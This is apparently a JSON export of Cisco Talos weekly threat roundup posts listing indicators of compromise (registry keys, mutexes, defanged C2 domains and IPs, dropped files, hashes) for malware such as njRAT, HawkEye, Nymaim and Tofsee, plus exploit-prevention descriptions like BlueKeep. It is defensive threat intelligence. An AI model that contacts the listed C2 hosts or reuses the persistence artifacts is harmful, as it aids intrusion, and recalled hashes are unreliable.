Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]videoall[.]net` | 23 \n`ns1[.]videoall[.]org` | 23 \n`ns1[.]player1532[.]com` | 23 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 23 \n`\\$RECYCLE.BIN.lnk` | 23 \n`\\System Volume Information.lnk` | 23 \n`\\Documents.lnk` | 23 \n`\\Music.lnk` | 23 \n`\\New Folder.lnk` | 23 \n`\\Passwords.lnk` | 23 \n`\\Pictures.lnk` | 23 \n`\\Video.lnk` | 23 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 23 \n`%HOMEPATH%\\<random, matching '[a-z]{5,7}'>.exe` | 23 \n`E:\\$RECYCLE.BIN.lnk` | 22 \n`E:\\autorun.inf` | 22 \n`E:\\x.mpeg` | 22 \n`E:\\System Volume Information.lnk` | 22 \n`E:\\Music.lnk` | 22 \n`E:\\Passwords.lnk` | 22 \n`E:\\Pictures.lnk` | 22 \n`E:\\Documents.lnk` | 22 \n`E:\\New Folder.lnk` | 22 \n`E:\\Video.lnk` | 22 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 22 \n`E:\\RFJ.ico` | 1 \n`\\RFJ.ico` | 1 \n`E:\\baaqaicx.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 09be96cf7eaf5a8b9e6231dc9f5760df58907a9c8dfb996e406361c3c72e5aa7 0c114b0894e482f57f0909cbd8b8dced3a8d6b20ec50139ccafdc81c1f21d6f2 107add01286993501566a44c448e321e27d3dadef2e2b62162b158cee42f4b80 210c1a435f47d5bca6300a4a323aa416e8edd2855946a9b5dc13f525e2061122 261ba2deae2f40205c12ecaa69ac285e3db2669ace697f4f52006aaca3046137 2642ae8489bf119064a09e9919cf06f92bc5b5882613c673745ffe89b34c2f43 30e340533c70f200d86348c10c78164a165e17a88f62b344e2b76f035386beae 323f9bcc53cdf71e937974d6523174ebb74151af8928d1148d0476c13b3e1622 37d2c4a0c7b4640261d4eae7bfe234eb4029a5686589e96fa78d9da20bf2add8 408680beb42a3d4123ca4136cb02431efdb2efd112d546a378dfea96dd042f5d 423ddc412baf3a6aa9637d6258b7309f08ed1e1bc9c2dddc30cc25732998e42c 46a8888ab48c79a9bdef4cf4ff58f5f58feb8ad6e3926a6ee98f7ea1dc2b383a 4e8f5a3497e7263ad12bdb242fdcbbd9c2d1ff85e862b263ce4b4d138f00002c 5642cb5f8c9d9115143cf67b67b50327dc6ac07c78e87334f52d3a89ef7e855c 575c4e03f446b9ae91769cc7be8b7cc8aa451d607615a69ac0797190240f0bff 
5c3a99fa29ab5917f2facf4383dd6284c2fd4c93c0aa9a16cf5a8b605ce3521c 605712812595a21fae8b728974d328ecc2811792cec2f0808653d2ea8ee556c2 610519390720b741a8b2de2686575141bf8839473abdc06ffa9ecfd7efb88a3c 640f88b445819b50d801f63bba996635c07883cf245ddca2f39b592ce07d0a30 777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab 7f285a63779f27c9793b5fdcdcc9f8e8d48207298cb4c3cd18e27889c2dd052a 8232b50475cf369b325dc6866d6b88c27245faf7e572a3629b5c0ad3a88cbd72 84b677c976458077b79120064fe7aa275ad33d19d7651425f3faf6cd717fc520 8536b9a9da4f0b6930ed148166800147062e93f6c31ad70f61eb7ed174383c80 89f1ede2d77a45043f2ce760265d21a512f5e5b011cde43f76c3b968214530e5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-npiRaUMl5QI/XaCbL0aozgI/AAAAAAAACw4/LnDHJMeh_OYLyc-o9kM-VB7fLsk5ohDsgCLcBGAsYHQ/s1600/777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-AMmyrvJ7XZc/XaCbPzyiIyI/AAAAAAAACw8/Dgd1uJRdRNI9ISwCShI7TnLNrnhStOM1wCLcBGAsYHQ/s1600/777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab_tg.png>)\n\n \n\n\n#### Umbrella\n\n* * *\n\n### Win.Dropper.Upatre-7196259-0\n\n#### Indicators of Compromise\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\szgfw.exe` | 43 \n \n#### File Hashes\n\n` 0209860624b9650a80e8e7ccd913c68bbd5e4be9e503c2a1b554c6b3b94861a1 0755dff6699aebb40a37368f78ed9a7b66d3e24d039af8cdd2ad13b8ef969273 0e2cb655432353bc5f362692d75f76b1deb6d4c339db1eacb671731c5f23a733 1191f1f7a73c262102b8ec25f2aecefc26eef287e55934e608ba510b45bff3db 11aa23a13c9a53dae82684af6adf9835fe027550d5b9bfd21604ab1261c97224 25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514 
35588e1d2203194ae0524d551d9a5d45bccbfbd9ef226a25e223c4e626db8e7e 37715e5cfc32e42ccd741a8ca0b17276c76b9d28c2ab4ab4edc4ba712cfe98a4 47b69664dd70b8ed9e0f369640f4dfd27a5a33b8bd3d83d572b667551d6465cd 47cbf5466f14bacd5dae7a217a85673048245844e39d081ce4009aa8bbdf0743 48b14ad94dbfe648d7ef4cbce8debeec6b009d9972cb026f7f4ecfea72ae380d 4c6c1e0eb3b508e3bd525b4ce71a1309d231b218f7172bfb5da57a93a050ab5c 4d30d13f5454bc30c92643657d4113a4008e09cd06491e1f73801a14b5415cf5 50bf198fb00ff18f6b08b9aff48c8b5ffcc85cc0dcda23a0359f413113fd6207 51cd17e592d2ebadfd3f15ca6b542f78b2adb4f26b7eaf8c254e849ee141bcc4 52f3ac52e9e2e9ebaba6da86ea629ad07b2017a44a5be6f66a576853341cc1ca 5cdc406d0cfc60b4a6b5cce5411932f250bcf7c60863e71111f461130c2d942f 607473f50e64388087985abb0bb05caa8688a1a17c25607508bb2a3a8a62fc13 607ac8ad70dc43765ea3954c09b2dbe320f7dbe4fe9fee9b07fab9e855aef37b 6516b8c920ae407765804372470187aa6749d1f598e87b7dbe8bf47291039568 658f7d3524bc9db586321be2fb22b1d832cd6f80328dcdbecdfc2734ff45487a 6812985cee6342855219205500bd1bb53300d552f17b88dbeeab1cdad32e55bf 6be61289884c2bd01ddade32649d23fac7bc0ba4591f3eed911101eb44c5181b 6f8ed68f17904767ecd16b1cb1943caa8f474912bffc930082e64512fa48f96f 75c817a4d49bc40781537143aabad6f0496129120503b7276854e9db15b4a965 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-jORer6zG5lg/XaCcnSoEUTI/AAAAAAAACxI/3K0rudeNV6sQDtXyq2dkwtlQHnkJCZMsACLcBGAsYHQ/s1600/25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-HPERaTirDok/XaCcrF_0usI/AAAAAAAACxM/JboQATczhfI_PP-n_EGmQdO-X7SGysGxwCLcBGAsYHQ/s1600/25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit 
Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (17383) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nExcessively long PowerShell command detected \\- (3263) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats. \nMadshi injection detected \\- (2949) \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1750) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. 
It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nAtom Bombing code injection technique detected \\- (577) \nA process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then accessing it through an Asynchronous Procedure Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well. \nProcess hollowing detected \\- (512) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (158) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (149) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. 
\nInstallcore adware detected \\- (79) \nInstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nAggah malware dropper detected \\- (61) \nThe Aggah dropper technique has been detected. The Aggah campaign has been observed dropping Azorult, LokiBot and other malware families. Aggah employs phishing and process hollowing to infect victim machines. \n \n", "modified": "2019-10-11T08:45:39", "published": "2019-10-11T08:45:39", "id": "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nfy1VpFBlhE/threat-roundup-1004-1011.html", "type": "talosblog", "title": "Threat Roundup for October 4 to October 11", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-16T17:39:35", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 9 and Aug. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. 
Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d56c3400d3b7.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Packed.njRAT-7122661-1 | Packed | njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014. \nWin.Malware.HawkEye-7122916-2 | Malware | HawkEye is an information stealing malware that specifically targets usernames and passwords stored by web browsers and mail clients on an infected machine. It is commonly spread via email and can also propagate through removable media. \nWin.Malware.Cybergate-7114776-1 | Malware | Cybergate, also known as Rebhip, is a Remote Access Trojan that allows attackers to fully control the target system. Functionality includes command shell interaction, screenshot capturing, audio/video capturing, keylogging, as well as uploading/downloading files from the target system. \nWin.Malware.Nymaim-7112030-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. 
It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Malware.Tofsee-7112026-1 | Malware | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Malware.Trickbot-7112005-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Malware.Gh0stRAT-7109635-2 | Malware | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nWin.Packed.Zeroaccess-7109532-0 | Packed | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns. \nWin.Trojan.Shiz-7108197-0 | Trojan | Shiz is a remote access trojan that allows an attacker to access an infected machine in order to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site. 

* * *

## Threat Breakdown

### Win.Packed.njRAT-7122661-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\S-1-5-21-2580483871-590521980-3826313501-500` Value Name: `di` | 18
`<HKCU>\ENVIRONMENT` Value Name: `SEE_MASK_NOZONECHECKS` | 18
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON` Value Name: `ParseAutoexec` | 18
`<HKCU>\SOFTWARE\91DFFF70961506A1564FE50B6195DEAD` | 18
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `91dfff70961506a1564fe50b6195dead` | 18
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `91dfff70961506a1564fe50b6195dead` | 18
`<HKCU>\SOFTWARE\91DFFF70961506A1564FE50B6195DEAD` Value Name: `[kl]` | 18

Mutexes | Occurrences
---|---
`91dfff70961506a1564fe50b6195dead` | 18

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`187[.]4[.]28[.]100` | 15
`189[.]10[.]170[.]195` | 3

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`aab58[.]ddns[.]net` | 18

Files and/or directories created | Occurrences
---|---
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\91dfff70961506a1564fe50b6195dead.exe` | 18
`%TEMP%\iexpress32.exe` | 18

#### File Hashes

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa |

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-pH0rrFbiEJs/XVbIbUL23gI/AAAAAAAACVM/xCKcqmwtsEwP9IubdwRmztXODaxHbiUXwCLcBGAs/s1600/95ba99bc91142b433da3a42eaaeefb1ce2a7abe93f2d8816b931eaccff600192_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-IkjRJZ9jMf0/XVbIfx2_0kI/AAAAAAAACVQ/OAgbPbgJvvw-lu3AJQWR6s1zsOSa2b10wCLcBGAs/s1600/95ba99bc91142b433da3a42eaaeefb1ce2a7abe93f2d8816b931eaccff600192_tg.png>)

* * *

### Win.Malware.HawkEye-7122916-2

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED` Value Name: `Hidden` | 11
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Windows Update` | 3
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE` Value Name: `Registry Key Name` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`104[.]16[.]155[.]36` | 7
`104[.]16[.]154[.]36` | 4
`93[.]158[.]134[.]38` | 2
`87[.]250[.]250[.]38` | 1
`136[.]143[.]191[.]189` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`whatismyipaddress[.]com` | 11
`smtp[.]yandex[.]com` | 3
`smtp[.]zoho[.]com` | 1

Files and/or directories created | Occurrences
---|---
`%TEMP%\holdermail.txt` | 11
`%APPDATA%\pid.txt` | 11
`%APPDATA%\pidloc.txt` | 11
`%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp` | 11
`\Sys.exe` | 9
`\autorun.inf` | 9
`E:\autorun.inf` | 9
`E:\Sys.exe` | 9
`%TEMP%\holderwb.txt` | 8
`%TEMP%\SysInfo.txt` | 8
`%APPDATA%\Windows Update.exe` | 8
`%APPDATA%\WindowsUpdate.exe` | 3
`%TEMP%\subfolder` | 1
`%TEMP%\subfolder\filename.exe` | 1
`%TEMP%\subfolder\filename.vbs` | 1

#### File Hashes

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-No-gWOW1aFo/XVbIzzGY5jI/AAAAAAAACVc/NC_Wd08Ugp4BIPusHwoSCv2euCNDFrAOgCLcBGAs/s1600/621448e4a383b6bcba18f2b522331c6f79764db97a73d596d92308f36a2b5add_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-99K4uGT2iKI/XVbI3pyc_NI/AAAAAAAACVg/ueeZd27yxjMeLJrcVLJXLTI2ikYClMrmQCLcBGAs/s1600/621448e4a383b6bcba18f2b522331c6f79764db97a73d596d92308f36a2b5add_tg.png>)

* * *

### Win.Malware.Cybergate-7114776-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` | 13
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` | 13
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` Value Name: `MSQM` | 12
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` Value Name: `MSQM` | 12
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Realtek Audio` | 12
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Adobe Starter` | 12
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0H0N0B4G-P8H0-63SU-QBB1-QXKN5M1261DQ}` | 2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0H0N0B4G-P8H0-63SU-QBB1-QXKN5M1261DQ}` Value Name: `StubPath` | 2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1C7T55HW-D326-IWQK-6087-652774G5V2RN}` | 2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1C7T55HW-D326-IWQK-6087-652774G5V2RN}` Value Name: `StubPath` | 2
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0KWTNM33-D745-1P14-D1BA-224TD37L2DP8}` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{86TIP765-B0E5-AB86-L87O-3R28QFSJGN0J}` | 1
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` Value Name: `Policies` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` Value Name: `Policies` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Audio` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Audio` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{0KWTNM33-D745-1P14-D1BA-224TD37L2DP8}` Value Name: `StubPath` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{86TIP765-B0E5-AB86-L87O-3R28QFSJGN0J}` Value Name: `StubPath` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6W6SH85E-GESR-7C8G-187D-4M6664523332}` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6W6SH85E-GESR-7C8G-187D-4M6664523332}` Value Name: `StubPath` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{G718OU16-FJJG-TVIB-LQ35-WINSRC80H3GD}` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{G718OU16-FJJG-TVIB-LQ35-WINSRC80H3GD}` Value Name: `StubPath` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{41LU5C5I-NQ05-2KS6-7E2G-P3AD1GREFY8T}` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{41LU5C5I-NQ05-2KS6-7E2G-P3AD1GREFY8T}` Value Name: `StubPath` | 1
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{216555Q4-64KR-BMG3-55K7-2354V88S0LSE}` | 1

Mutexes | Occurrences
---|---
`_x_X_BLOCKMOUSE_X_x_` | 13
`_x_X_PASSWORDLIST_X_x_` | 13
`_x_X_UPDATE_X_x_` | 13
`Pluguin` | 12
`Pluguin_PERSIST` | 12
`Pluguin_SAIR` | 12
`***MUTEX***` | 1
`***MUTEX***_PERSIST` | 1
`***MUTEX***_SAIR` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`187[.]58[.]232[.]18` | 12
`52[.]8[.]126[.]80` | 1

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`rainoide[.]no-ip[.]org` | 12
`www[.]server[.]com` | 1

Files and/or directories created | Occurrences
---|---
`%TEMP%\XX--XX--XX.txt` | 13
`%TEMP%\UuU.uUu` | 13
`%TEMP%\XxX.xXx` | 13
`%APPDATA%\logs.dat` | 13
`%SystemRoot%\SysWOW64\Microsoft` | 13
`%SystemRoot%\SysWOW64\Microsoft\svchost.exe` | 12
`%SystemRoot%\SysWOW64\Microsoft\svchost` | 1

#### File Hashes

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-LkooKXXCB3k/XVbJL1GjSKI/AAAAAAAACVs/P3ioLttedk01O8GSTXN3F3Ez68VQxxtUwCLcBGAs/s1600/c5d0479add616c17dfdef957dc106522ff40bebd08ab070b0941474715a29dfb_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-Hmrw5DUbKFE/XVbJRY0zfSI/AAAAAAAACV0/KLxMMgAw2s0khNXr654LP6Py10ftXkpPgCLcBGAs/s1600/b3b914069bb60dab4a0679f912c43f77a3c4bf71804fcbd5085646336dc41908_tg.png>)

* * *

### Win.Malware.Nymaim-7112030-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\GOCFK` | 25
`<HKCU>\SOFTWARE\MICROSOFT\GOCFK` Value Name: `mbijg` | 25

Mutexes | Occurrences
---|---
`Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 25
`Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 25
`Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 25
`Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 25
`Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 25
`Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 25
`Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 25
`Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}` | 25
`Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}` | 25

Domain Names contacted by malware. Does not indicate maliciousness.

*See JSON for more IOCs

Files and/or directories created | Occurrences
---|---
`%ProgramData%\ph` | 25
`%ProgramData%\ph\fktiipx.ftf` | 25
`%TEMP%\gocf.ksv` | 25
`%ProgramData%\<random, matching '[a-z0-9]{3,7}'>` | 25
`%APPDATA%\<random, matching '[a-z0-9]{3,7}'>` | 25
`%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'>` | 25
`%TEMP%\fro.dfx` | 23
`\Documents and Settings\All Users\pxs\pil.ohu` | 23
`%TEMP%\bpnb.skg` | 4

#### File Hashes

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

[](<https://1.bp.blogspot.com/-TCdoY-FfZd0/XVbK9iMxXNI/AAAAAAAACWE/RJqcAlpU3DwPknqOF5mc4AKMmRG0iUJJwCLcBGAs/s1600/e1797282c01e2bcf9e03707136cfc60bfdee5818cb1ec59984befd55de4c6719_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-S8jyzEW01O8/XVbLBqze8EI/AAAAAAAACWI/O89cdi7f3HchJ3DdboCaq75F0TyENHERgCLcBGAs/s1600/e1797282c01e2bcf9e03707136cfc60bfdee5818cb1ec59984befd55de4c6719_tg.png>)

#### Umbrella

[](<https://1.bp.blogspot.com/-tnyj0tFUBxM/XVbLIZStF7I/AAAAAAAACWM/kYzbbwLc0d4DADi-hAgbpeY0PFZQcsmMgCLcBGAs/s1600/01fbd952fe57f673aea818e12a0aa675c9e29e1ba0f85d28645a926f3df4f7f4_umbrella.png>)

* * *

### Win.Malware.Tofsee-7112026-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKU>\.DEFAULT\CONTROL PANEL\BUSES` Value Name: `Config3` | 16
\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 16 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 16 